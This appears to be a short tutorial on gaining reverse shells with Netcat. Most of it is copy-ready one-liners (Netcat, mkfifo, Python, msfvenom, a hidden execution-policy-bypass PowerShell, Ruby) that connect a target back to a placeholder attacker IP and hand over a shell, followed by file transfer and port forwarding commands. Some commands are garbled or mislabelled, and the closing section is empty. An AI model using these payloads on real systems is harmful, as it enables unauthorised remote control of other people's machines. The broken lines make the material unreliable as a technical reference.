In this article, we will learn how to use Netcat to get reverse shells from targeted machines.
Netcat, often called the "Swiss Army knife" of networking, is a simple but powerful command-line tool for reading and writing data across network connections. It can be used for a variety of tasks, including port scanning, transferring files, creating backdoors, and setting up network connections between machines.
Netcat is like a communication tool that lets two computers talk to each other over a network. You can use it to send or receive data between machines by specifying an IP address and port number. Think of it as a direct link between computers, where you can transfer text, files, or commands from one machine to another.
A reverse shell is a type of remote shell where the target machine initiates the connection back to the attacker's machine, unlike a traditional shell where the attacker connects to the target. This technique is often used in penetration testing to bypass firewalls or network restrictions because the outgoing connection is more likely to be allowed by the target machine’s firewall.
You may like to read more about Introduction to Linux for Blue Teaming
What You’ll Learn in This Article
- Using Netcat
- Using Python
- Using Msfvenom
- Using Powershell
- Using Ruby
- Netcat Usages
nc -lvp 4444
nc <attacker_IP> 4444 -e /bin/bash
2. Netcat with mkfifo:
On the attacker’s machine
nc -lvp 4444
mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
nc -lvp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Use Python2, python as per your system requirement
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf
On the attacker’s machine:
chmod +x shell.elf./shell.elf
Using PowerShell
nc -lvp 4444
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
nc -lvp 4444
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a Windows system to a Kali Linux system. To send the file from Windows, we will use the following command.
nc -v -w 20 -p 8888 -l file.txt
UDP Mode
Use Netcat in UDP mode for sending and receiving UDP packets. UDP is connectionless, making it suitable for applications like streaming media or DNS queries.nc -u -l -p <port> //Listen
nc -u <destination_ip> <port> //Send
Port Forwarding
Incoming connections to the local port are redirected to the specified destination IP and port
nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"
Port Redirection:
Redirect incoming connections from one port to another locally. Netcat listens for connections on the local port and forwards them to the specified redirection port.
nc -l -p <local_port> -c "nc -l <redirection_port>"
this is the example of how to use Netcat to get a connection over any system using different requirements. there is number of ways that can help to get a shell using Netcat.
How the Reverse Shell Works